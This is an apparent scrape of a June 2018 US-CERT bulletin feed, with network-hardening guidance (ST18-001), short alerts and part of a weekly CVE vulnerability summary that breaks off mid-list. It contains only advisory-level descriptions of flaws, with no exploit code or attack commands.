Security Bulletins

US-CERT: The United States Computer Emergency Readiness Team   more  xml  hide  
last updated: Fri, 22 Jun 2018 10:50:07 GMT

 Thu, 21 Jun 2018 20:10:15 +0000 Global Threats to Information Systems
Original release date: June 21, 2018

The advanced capabilities of organized hacker groups and cyber threat actors are an increasing global threat to information systems. Rising threat levels place more demands on cybersecurity personnel and network administrators to protect information systems. Protecting network infrastructure is critical to preserving the confidentiality, integrity, and availability of communication and services across an enterprise.

Cyber campaigns—such as NotPetya—are examples of increasingly advanced threat actor activity. NotPetya coincided with a national holiday of the targeted nation. NCCIC recommends organizations remain vigilant and aware of potential malicious cyber activity ahead of upcoming national holidays, including Ukraine’s Constitution Day on June 28, 2018.

NCCIC encourages users and administrators to review Securing Network Infrastructure Devices and the United Kingdom’s National Cyber Security Centre (NCSC) guidance on Internet Edge Device Security and implement the following recommendations:

  • Segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Harden network devices.
  • Secure access to infrastructure devices.
  • Perform out-of-band network management.
  • Validate hardware and software integrity.

This product is provided subject to this Notification and this Privacy & Use policy.


 Thu, 21 Jun 2018 19:46:35 +0000 ST18-001: Securing Network Infrastructure Devices
Original release date: June 21, 2018

Network infrastructure devices are ideal targets for malicious cyber actors. Most or all organizational and customer traffic must traverse these critical devices.

  • An attacker with presence on an organization’s gateway router can monitor, modify, and deny traffic to and from the organization.
  • An attacker with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts.

Organizations and individuals that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these malicious cyber actors. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.

What are network infrastructure devices?

Network infrastructure devices are the physical components of a network that transport communications needed for data, applications, services, and multi-media. These devices include routers, firewalls, switches, servers, load-balancers, intrusion detection systems, domain name systems, and storage area networks.

What security threats are associated with network infrastructure devices?

Network infrastructure devices are often easy targets for attackers. Once installed, many network devices are not maintained at the same security level as general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:

  • Few network devices—especially small office/home office and residential-class routers—run antivirus, integrity-maintenance, and other security tools that help protect general-purpose hosts.
  • Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.
  • Owners and operators of network devices often don’t change vendor default settings, harden them for operations, or perform regular patching.
  • Internet service providers may not replace equipment on a customer’s property once the equipment is no longer supported by the manufacturer or vendor.
  • Owners and operators often overlook network devices when they investigate, look for intruders, and restore general-purpose hosts after cyber intrusions.

How can you improve the security of network infrastructure devices?

NCCIC encourages users and network administrators to implement the following recommendations to better secure their network infrastructure:

  • Segment and segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Harden network devices.
  • Secure access to infrastructure devices.
  • Perform Out-of-Band network management.
  • Validate integrity of hardware and software.

Segment and Segregate Networks and Functions

Security architects must consider the overall infrastructure layout, including segmentation and segregation. Proper network segmentation is an effective security mechanism to prevent an intruder from propagating exploits or laterally moving around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders in the event that they have gained a foothold somewhere inside the network.

Physical Separation of Sensitive Information

Traditional network devices, such as routers, can separate local area network (LAN) segments. Organizations can place routers between networks to create boundaries, increase the number of broadcast domains, and effectively filter users’ broadcast traffic. Organizations can use these boundaries to contain security breaches by restricting traffic to separate segments and can even shut down segments of the network during an intrusion, restricting adversary access.

Recommendations

  • Implement principles of least privilege and need-to-know when designing network segments.
  • Separate sensitive information and security requirements into network segments.
  • Apply security recommendations and secure configurations to all network segments and network layers.

Virtual Separation of Sensitive Information

As technologies change, new strategies are developed to improve information technology efficiencies and network security controls. Virtual separation is the logical isolation of networks on the same physical network. Virtual segmentation uses the same design principles as physical segmentation but requires no additional hardware. Existing technologies can be used to prevent an intruder from breaching other internal network segments.

Recommendations

  • Use private virtual LANs to isolate a user from the rest of the broadcast domains.
  • Use virtual routing and forwarding (VRF) technology to segment network traffic over multiple routing tables simultaneously on a single router.
  • Use virtual private networks (VPNs) to securely extend a host/network by tunneling through public or private networks.

Limit Unnecessary Lateral Communications

Allowing unfiltered peer-to-peer communications, including workstation-to-workstation, creates serious vulnerabilities and can allow a network intruder’s access to spread easily to multiple systems. Once an intruder establishes an effective beachhead within the network, unfiltered lateral communications allow the intruder to create backdoors throughout the network. Backdoors help the intruder maintain persistence within the network and hinder defenders’ efforts to contain and eradicate the intruder.

Recommendations

  • Restrict communications using host-based firewall rules to deny the flow of packets from other hosts in the network. The firewall rules can be created to filter on a host device, user, program, or internet protocol (IP) address to limit access from services and systems.
  • Implement a VLAN Access Control List (VACL), a filter that controls access to and from VLANs. VACL filters should be created to deny packets the ability to flow to other VLANs.
  • Logically segregate the network using physical or virtual separation, allowing network administrators to isolate critical devices onto network segments.

Harden Network Devices

A fundamental way to enhance network infrastructure security is to safeguard networking devices with secure configurations. Government agencies, organizations, and vendors supply a wide range of guidance to administrators—including benchmarks and best practices—on how to harden network devices. Administrators should implement the following recommendations in conjunction with laws, regulations, site security policies, standards, and industry best practices.

Recommendations

  • Disable unencrypted remote admin protocols used to manage network infrastructure (e.g., Telnet, File Transfer Protocol [FTP]).
  • Disable unnecessary services (e.g., discovery protocols, source routing, Hypertext Transfer Protocol, Simple Network Management Protocol [SNMP], Bootstrap Protocol).
  • Use SNMPv3 (or subsequent version), but do not use SNMP community strings.
  • Secure access to the console, auxiliary, and virtual terminal lines.
  • Implement robust password policies, and use the strongest password encryption available.
  • Protect routers and switches by controlling access lists for remote administration.
  • Restrict physical access to routers and switches.
  • Back up configurations and store them offline. Use the latest version of the network device operating system and keep it updated with all patches.
  • Periodically test security configurations against security requirements.
  • Protect configuration files with encryption or access controls when sending, storing, and backing up files.

Secure Access to Infrastructure Devices

Administrative privileges can be granted to allow users access to resources that are not widely available. Limiting administrative privileges for infrastructure devices is crucial to security because intruders can exploit administrative privileges that are improperly authorized, granted widely, or not closely audited. Adversaries can use these compromised privileges to traverse a network, expand access, and take full control of the infrastructure backbone. Organizations can mitigate unauthorized infrastructure access by implementing secure access policies and procedures.

Recommendations

  • Implement multi-factor authentication (MFA). Authentication is a process used to validate a user’s identity. Attackers commonly exploit weak authentication processes. MFA uses at least two identity components to authenticate a user’s identity. Identity components include
    • something the user knows (e.g., password),
    • an object the user has possession of (e.g., token), and
    • a trait unique to the user (e.g., fingerprint).
  • Manage privileged access. Use a server that provides authentication, authorization, and accounting (AAA) services to store access information for network device management. An AAA server will enable network administrators to assign different privilege levels to users based on the principle of least privilege. When a user tries to execute an unauthorized command, it will be rejected. If possible, implement a hard-token authentication server in addition to using the AAA server. Using MFA makes it more difficult for intruders to steal and reuse credentials to gain access to network devices.
  • Manage administrative credentials. Take these actions if your system cannot meet the MFA best practice:
    • Change default passwords.
    • Recommend passwords to be at least 8 characters long, and allow passwords as long as 64 characters (or greater), in accordance with the National Institute of Standards and Technology’s SP 800-63B Digital Identity Guidelines and Canada’s User Authentication Guidance for Information Technology Systems ITSP.30.031 V3.
    • Check passwords against blacklists of unacceptable values, such as commonly used, expected, or compromised passwords.
    • Ensure all stored passwords are salted and hashed.
    • Keep passwords stored for emergency access in a protected off-network location, such as a safe.

Perform Out-of-Band Management

Out-of-Band (OoB) management uses alternate communication paths to remotely manage network infrastructure devices. These dedicated communication paths can vary in configuration to include anything from virtual tunneling to physical separation. Using OoB access to manage the network infrastructure will strengthen security by limiting access and separating user traffic from network management traffic. OoB management provides security monitoring and can perform corrective actions without allowing the adversary (even one who has already compromised a portion of the network) to observe these changes.

OoB management can be implemented physically, virtually, or through a hybrid of the two. Although additional physical network infrastructure additional infrastructure can be very expensive to implement and maintain, it is the most secure option for network managers to adopt. Virtual implementation is less costly but still requires significant configuration changes and administration. In some situations, such as access to remote locations, virtual encrypted tunnels may be the only viable option.

Recommendations

  • Segregate standard network traffic from management traffic.
  • Ensure that management traffic on devices comes only from OoB.
  • Apply encryption to all management channels.
  • Encrypt all remote access to infrastructure devices such as terminal or dial-in servers.
  • Manage all administrative functions from a dedicated, fully patched host over a secure channel, preferably on OoB.
  • Harden network management devices by testing patches, turning off unnecessary services on routers and switches, and enforcing strong password policies. Monitor the network and review logs. Implement access controls that only permit required administrative or management services (e.g., SNMP, Network Time Protocol, Secure Shell, FTP, Trivial File Transfer Protocol, RDP, SMB).

Validate Integrity of Hardware and Software

Products purchased through unauthorized channels are often counterfeit, secondary, or grey market devices. Numerous media reports have described the introduction of grey market hardware and software into the marketplace. Illegitimate hardware and software present a serious risk to users’ information and the overall integrity of the network environment. Grey market products can introduce risks to the network because they have not been thoroughly tested to meet quality standards. Purchasing products from the secondary market carries the risk of acquiring counterfeit, stolen, or second-hand devices because of supply chain breaches. Furthermore, breaches in the supply chain provide an opportunity for malicious software and hardware to be installed on the equipment. Compromised hardware and software can affect network performance and compromise the confidentiality, integrity, or availability of network assets. Finally, unauthorized or malicious software can be loaded onto a device after it is in operational use, so organizations should regularly check the integrity of software.

Recommendations

  • Maintain strict control of the supply chain and purchase only from authorized resellers.
  • Require resellers to enforce integrity checks of the supply chain to validate hardware and software authenticity.
  • Upon installation, inspect all devices for signs of tampering.
  • Validate serial numbers from multiple sources.
  • Download software, updates, patches, and upgrades from validated sources.
  • Perform hash verification, and compare values against the vendor’s database to detect unauthorized modification to the firmware.
  • Monitor and log devices—verifying network configurations of devices—on a regular schedule.
  • Train network owners, administrators, and procurement personnel to increase awareness of grey market devices.

Author: NCCIC Publications

This product is provided subject to this Notification and this Privacy & Use policy.

 Wed, 20 Jun 2018 18:45:51 +0000 Cisco Releases Security Updates for Multiple Products
Original release date: June 20, 2018

Cisco has released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:


This product is provided subject to this Notification and this Privacy & Use policy.


 Mon, 18 Jun 2018 21:42:50 +0000  FTC, Partners Help Small Businesses Stop Scams
Original release date: June 18, 2018

The Federal Trade Commission (FTC) has launched Operation Main Street, an effort with the Better Business Bureau (BBB) and law enforcement to educate small business owners on how to stop scams targeting their businesses. Accordingly, FTC released Scams and Your Small Business, a guide for businesses detailing how to avoid, identify, and report scams.

NCCIC encourages business owners and other consumers to review the FTC article and NCCIC's Resources for Small and Midsize Businesses.


This product is provided subject to this Notification and this Privacy & Use policy.


 Mon, 18 Jun 2018 10:52:15 +0000 SB18-169: Vulnerability Summary for the Week of June 11, 2018
Original release date: June 18, 2018

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

High Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
microsoft -- windows_10An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 10, Windows 10 Servers.2018-06-147.2CVE-2018-8233
BID
SECTRACK
CONFIRM
microsoft -- windows_10A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka "Media Foundation Memory Corruption Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.2018-06-147.6CVE-2018-8251
BID
SECTRACK
CONFIRM
Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
There were no medium vulnerabilities recorded this week.
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
There were no low vulnerabilities recorded this week.
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
389-ds-base -- 389-ds-base
 
389-ds-base before versions 1.4.0.10, 1.3.8.3 is vulnerable to a race condition in the way 389-ds-base handles persistent search, resulting in a crash if the server is under load. An anonymous attacker could use this flaw to trigger a denial of service.2018-06-13not yet calculatedCVE-2018-10850
CONFIRM
CONFIRM
CONFIRM
acccheck -- acccheck
 
acccheck.pl in acccheck 0.2.1 allows Command Injection via shell metacharacters in a username or password file, as demonstrated by injection into an smbclient command line.2018-06-13not yet calculatedCVE-2018-12268
MISC
apache -- geode
 
When an Apache Geode server versions 1.0.0 to 1.4.0 is configured with a security manager, a user with DATA:WRITE privileges is allowed to deploy code by invoking an internal Geode function. This allows remote code execution. Code deployment should be restricted to users with DATA:MANAGE privilege.2018-06-13not yet calculatedCVE-2017-15695
BID
MLIST
apache -- tika
 
Archive.java in Junrar before 1.0.1, as used in Apache Tika and other products, is affected by a denial of service vulnerability due to an infinite loop when handling corrupt RAR files.2018-06-14not yet calculatedCVE-2018-12418
MISC
MISC
apple -- ios_and_safari
 
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. The issue involves the "Safari" component. It allows remote attackers to cause a denial of service (persistent Safari outage) via a crafted web site.2018-06-08not yet calculatedCVE-2018-4247
BID
SECTRACK
CONFIRM
CONFIRM
MISC
apple -- macos_and_osx
 
An issue was discovered in Yelp OSXCollector. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute.2018-06-13not yet calculatedCVE-2018-10406
MISC
apple -- macos_and_osx
 
An issue was discovered in Google Santa and molcodesignchecker. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute.2018-06-13not yet calculatedCVE-2018-10405
MISC
apple -- macos_and_osx
 
An issue was discovered in F-Secure XFENCE and Little Flocker. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute.2018-06-13not yet calculatedCVE-2018-10403
MISC
apple -- macos_and_osx
 
An issue was discovered in Objective-See KnockKnock, LuLu, TaskExplorer, WhatsYourSign, and procInfo. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute.2018-06-13not yet calculatedCVE-2018-10404
MISC
apple -- macos_and_osx
 
An issue was discovered in Carbon Black Cb Response. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute.2018-06-13not yet calculatedCVE-2018-10407
MISC
apple -- macos_and_osx
 
An issue was discovered in VirusTotal. A maliciously crafted Universal/fat binary can evade third-party code signing checks. By not completing full inspection of the Universal/fat binary, the user of the third-party tool will believe that the code is signed by Apple, but the malicious unsigned code will execute.2018-06-13not yet calculatedCVE-2018-10408
MISC
apple -- multiple_products
 
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code via a crafted web site that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation.2018-06-08not yet calculatedCVE-2018-4222
SECTRACK
MISC
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- multiple_products
 
An issue was discovered in certain Apple products. iOS before 11.4 is affected. Safari before 11.1.1 is affected. iCloud before 7.5 on Windows is affected. iTunes before 12.7.5 on Windows is affected. tvOS before 11.4 is affected. watchOS before 4.3.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site that triggers an @generatorState use-after-free.2018-06-08not yet calculatedCVE-2018-4218
SECTRACK
MISC
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- safari
 
An issue was discovered in certain Apple products. Safari before 11.1.1 is affected. The issue involves the "Safari" component. It allows remote attackers to spoof the address bar via a crafted web site.2018-06-08not yet calculatedCVE-2018-4205
BID
SECTRACK
CONFIRM
artica -- pandora_fms
 
Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.2018-06-15not yet calculatedCVE-2018-11222
MISC
CONFIRM
artica -- pandora_fms
 
XSS in Artica Pandora FMS before 7.0 NG 723 allows an attacker to execute arbitrary code via a crafted "refr" parameter in a "/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=" call.2018-06-15not yet calculatedCVE-2018-11223
MISC
CONFIRM
artica -- pandora_fms
 
Unauthenticated untrusted file upload in Artica Pandora FMS through version 7.23 allows an attacker to upload an arbitrary plugin via include/ajax/update_manager.ajax in the update system.2018-06-15not yet calculatedCVE-2018-11221
MISC
CONFIRM
articlecms -- articlecms
 
ArticleCMS through 2017-02-19 has XSS via an "add an article" action.2018-06-13not yet calculatedCVE-2018-12339
MISC
automated_logic_corporation -- webctrl
 
An XXE issue was discovered in Automated Logic Corporation (ALC) WebCTRL Versions 6.0, 6.1 and 6.5. An unauthenticated attacker could enter malicious input to WebCTRL and a weakly configured XML parser will allow the application to disclose full file contents from the underlying web server OS via the "X-Wap-Profile" HTTP header.2018-06-14not yet calculatedCVE-2018-8819
MISC
FULLDISC
MISC
blackcatcms -- blackcatcms
 
Cross-site scripting (XSS) vulnerability in backend/pages/modify.php in BlackCatCMS 1.3 allows remote authenticated users with the Admin role to inject arbitrary web script or HTML via the search panel.2018-06-14not yet calculatedCVE-2018-10821
CONFIRM
CONFIRM
boringssl -- boringssl
 
BoringSSL through 2018-06-14 allows a memory-cache side-channel attack on DSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover a DSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12440
MISC
botan -- botan
 
Botan 2.5.0 through 2.6.0 allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP, related to dsa/dsa.cpp, ec_group/ec_group.cpp, and ecdsa/ecdsa.cpp. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12435
CONFIRM
MISC
canon -- printme_efi_webinterface
 
Cross-site scripting (XSS) vulnerability in the Canon PrintMe EFI webinterface allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the /wt3/mydocs.php URI.2018-06-11not yet calculatedCVE-2018-12111
MISC
EXPLOIT-DB
chevereto_free -- chevereto_free
 
Chevereto Free before 1.0.13 has XSS.2018-06-15not yet calculatedCVE-2018-12030
MISC
CONFIRM
digium – asterisk
 
An issue was discovered in Asterisk Open Source 13.x before 13.21.1, 14.x before 14.7.7, and 15.x before 15.4.1 and Certified Asterisk 13.18-cert before 13.18-cert4 and 13.21-cert before 13.21-cert2. When endpoint specific ACL rules block a SIP request, they respond with a 403 forbidden. However, if an endpoint is not identified, then a 401 unauthorized response is sent. This vulnerability just discloses which requests hit a defined endpoint. The ACL rules cannot be bypassed to gain access to the disclosed endpoints.2018-06-12not yet calculatedCVE-2018-12227
CONFIRM
BID
CONFIRM
digium – asterisk
 
An issue was discovered in Asterisk Open Source 15.x before 15.4.1. When connected to Asterisk via TCP/TLS, if the client abruptly disconnects, or sends a specially crafted message, then Asterisk gets caught in an infinite loop while trying to read the data stream. This renders the system unusable.2018-06-12not yet calculatedCVE-2018-12228
CONFIRM
BID
CONFIRM
dimofinf -- cms
 
Cross-site scripting (XSS) vulnerability in news.php in Dimofinf CMS Version 3.0.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.2018-06-11not yet calculatedCVE-2018-12094
MISC
EXPLOIT-DB
discount -- discount
 
The quoteblock function in markdown.c in libmarkdown.a in DISCOUNT 2.2.3a allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted file.2018-06-15not yet calculatedCVE-2018-12495
MISC
dropbox -- lepton
 
An issue was discovered in Dropbox Lepton 1.2.1. The validateAndCompress function in validation.cc allows remote attackers to cause a denial of service (SIGFPE and application crash) via a malformed file.2018-06-11not yet calculatedCVE-2018-12108
MISC
elliptic_curve -- cryptography_library
 
The Elliptic Curve Cryptography library (aka sunec or libsunec) allows a memory-cache side-channel attack on ECDSA signatures, aka the Return Of the Hidden Number Problem or ROHNP. To discover an ECDSA key, the attacker needs access to either the local machine or a different virtual machine on the same physical host.2018-06-14not yet calculatedCVE-2018-12438
MISC
enigmail -- enigmail 
 
The signature verification routine in Enigmail before 2.0.7 interprets user ids as status/control messages and does not correctly keep track of the status of multiple signatures, which allows remote attackers to spoof arbitrary email signatures via public keys containing crafted primary user ids.2018-06-13not yet calculatedCVE-2018-12019
MISC
MISC
ethereum -- futurxe_token
 
The transferFrom function of a smart contract implementation for FuturXE (FXE), an Ethereum ERC20 token, allows attackers to accomplish an unauthorized transfer of digital assets because of a logic error. The developer messed up with the boolean judgment - if the input value is smaller than or equal to allowed value, the transfer session would stop execution by returning false. This makes no sense, because the transferFrom() function should require the transferring value to not exceed the allowed value in the first place. Suppose this function asks for the allowed value to be smaller than the input. Then, the attacker could easily ignore the allowance: after this condition, the `allowed[from][msg.sender] -= value;` would cause an underflow because the allowed part is smaller than the value. The attacker could transfer any amount of FuturXe tokens of any accounts to an appointed account (the `_to` address) because the allowed value is initialized to 0, and the attacker could bypass this restriction even without the victim's private key.2018-06-11not yet calculatedCVE-2018-12025
MISC
exadel -- flamingo_amf-serializer
 
The Java implementation of AMF3 deserializers used by Flamingo amf-serializer by Exadel, version 2.2.0, allows external entity references (XXEs) from XML documents embedded within AMF3 messages. If the XML parsing is handled incorrectly it could potentially expose sensitive data on the server, denial of service, or server side request forgery.2018-06-11not yet calculatedCVE-2017-3206
BID
MISC
MISC
CERT-VN
exadel -- flamingo_amf-serializer
 
The Java implementation of AMF3 deserializers used in Flamingo amf-serializer by Exadel, version 2.2.0 derives class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.2018-06-11not yet calculatedCVE-2017-3201
BID
MISC
MISC
CERT-VN
exadel -- flamingo_amf-serializer
 
The Java implementation of AMF3 deserializers used in Flamingo amf-serializer by Exadel, version 2.2.0, may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized.2018-06-11not yet calculatedCVE-2017-3202
BID
MISC
MISC
CERT-VN
exiv2 -- exiv2
 
Exiv2 0.26 has an integer overflow in the LoaderExifJpeg class in preview.cpp, leading to an out-of-bounds read in Exiv2::MemIo::read in basicio.cpp.2018-06-13not yet calculatedCVE-2018-12265
CONFIRM
CONFIRM
exiv2 -- exiv2
 
Exiv2 0.26 has integer overflows in LoaderTiff::getData() in preview.cpp, leading to an out-of-bounds read in Exiv2::ValueType::setDataArea in value.hpp.2018-06-13not yet calculatedCVE-2018-12264
CONFIRM
CONFIRM
expresscart -- expresscart
 
expressCart before 1.1.6 allows remote attackers to create an admin user via a /admin/setup Referer header.2018-06-15not yet calculatedCVE-2018-12457
MISC
MISC
MISC
ffmpeg -- ffmpeg
 
libavcodec in FFmpeg 4.0 may trigger a NULL pointer dereference if the studio profile is incorrectly detected while converting a crafted AVI file to MPEG4, leading to a denial of service, related to idctdsp.c and mpegvideo.c.2018-06-15not yet calculatedCVE-2018-12460
CONFIRM
ffmpeg -- ffmpeg
 
An inconsistent bits-per-sample value in the ff_mpeg4_decode_picture_header function in libavcodec/mpeg4videodec.c in FFmpeg 4.0 may trigger an assertion violation while converting a crafted AVI file to MPEG4, leading to a denial of service.2018-06-15not yet calculatedCVE-2018-12459
CONFIRM
ffmpeg -- ffmpeg
 
An improper integer type in the mpeg4_encode_gop_header function in libavcodec/mpeg4videoenc.c in FFmpeg 4.0 may trigger an assertion violation while converting a crafted AVI file to MPEG4, leading to a denial of service.2018-06-15not yet calculatedCVE-2018-12458
CONFIRM
free_lossless_image_format -- free_lossless_image_format
 
An issue was discovered in Free Lossless Image Format (FLIF) 0.3. The TransformPaletteC<FileIO>::process function in transform/palette_C.hpp allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted PAM image file.2018-06-11not yet calculatedCVE-2018-12109
MISC
gnome -- evolution
 
addressbook/backends/ldap/e-book-backend-ldap.c in Evolution-Data-Server in GNOME Evolution through 3.29.2 might allow attackers to trigger a Buffer Overflow via a long query that is processed by the strcat function.2018-06-15not yet calculatedCVE-2018-12422
MISC
MISC
gnu --freedink_dfarcDirectory traversal issues in the D-Mod extractor in DFArc and DFArc2 (as well as in RTsoft's Dink Smallwood HD / ProtonSDK version) before 3.14 allow an attacker to overwrite arbitrary files on the user's system.2018-06-12not yet calculatedCVE-2018-0496
CONFIRM
CONFIRM
gnupg -- gnupg
 
mainproc.c in GnuPG before 2.2.8 mishandles the original filename during decryption and verification actions, which allows remote attackers to spoof the output that GnuPG sends on file descriptor 2 to other programs that use the "--status-fd 2" option. For example, the OpenPGP data might represent an original filename that contains line feed characters in conjunction with GOODSIG or VALIDSIG status codes.2018-06-08not yet calculatedCVE-2018-12020
MISC
BID
SECTRACK
MISC
MISC
UBUNTU
UBUNTU
DEBIAN
DEBIAN
DEBIAN
grafana -- grafana
 
Grafana before 5.2.0-beta1 has XSS vulnerabilities in dashboard links.2018-06-11not yet calculatedCVE-2018-12099
CONFIRM
CONFIRM
graniteds -- graniteds
 
The Java implementation of GraniteDS, version 3.1.1.GA, AMF3 deserializers derives class instances from java.io.Externalizable rather than the AMF3 specification's recommendation of flash.utils.IExternalizable. A remote attacker with the ability to spoof or control an RMI server connection may be able to send serialized Java objects that execute arbitrary code when deserialized.2018-06-11not yet calculatedCVE-2017-3199
BID
MISC
MISC
CERT-VN
graniteds -- graniteds
 
The Java implementation of AMF3 deserializers used in GraniteDS, version 3.1.1.G, may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized.2018-06-11not yet calculatedCVE-2017-3200
BID
MISC
MISC
CERT-VN
hongcms -- hongcms
 
system\errors\404.php in HongCMS 3.0.0 has XSS via crafted input that triggers a 404 HTTP status code.2018-06-13not yet calculatedCVE-2018-12266
MISC
huawei -- hg255s-10
 
Huawei HG255s-10 V100R001C163B025SP02 has a path traversal vulnerability due to insufficient validation of the received HTTP requests, a remote attacker may access the local files on the device without authentication.2018-06-14not yet calculatedCVE-2017-17309
CONFIRM
huawei -- lyo-l21_smart_phones
 
Huawei smart phones LYO-L21 with software LYO-L21C479B107, LYO-L21C479B107 have a privilege escalation vulnerability. An authenticated, local attacker can crafts malformed packets after tricking a user to install a malicious application and exploit this vulnerability when in the exception handling process. Successful exploitation may cause the attacker to obtain a higher privilege of the smart phones.2018-06-14not yet calculatedCVE-2017-17172
CONFIRM
huawei -- mate_9_smart_phones
 
Due to insufficient parameters verification GPU driver of Mate 9 Pro Huawei smart phones with the versions before LON-AL00B 8.0.0.356(C00) has an arbitrary memory free vulnerability. An attacker can tricks a user into installing a malicious application on the smart phone, and send given parameter to driver to release special kernel memory resource. Successful exploit may result in phone crash or arbitrary code execution.2018-06-14not yet calculatedCVE-2017-17173
CONFIRM
ibm -- financial_transaction_manager_for_ach_services_for_multi-platform
 
IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.6 could allow an authenticated user to execute a specially crafted command that could obtain sensitive information. IBM X-Force ID: 138378.2018-06-13not yet calculatedCVE-2018-1393
CONFIRM
BID
XF
ibm -- netezza_platform_software
 
IBM Netezza Platform Software (IBM PureData System for Analytics 1.0.0) could allow a local user to modify a world writable file, which could be used to execute commands as root. IBM X-Force ID: 140211.2018-06-15not yet calculatedCVE-2018-1460
CONFIRM
XF
MISC
ibm -- spectrum_scale
 
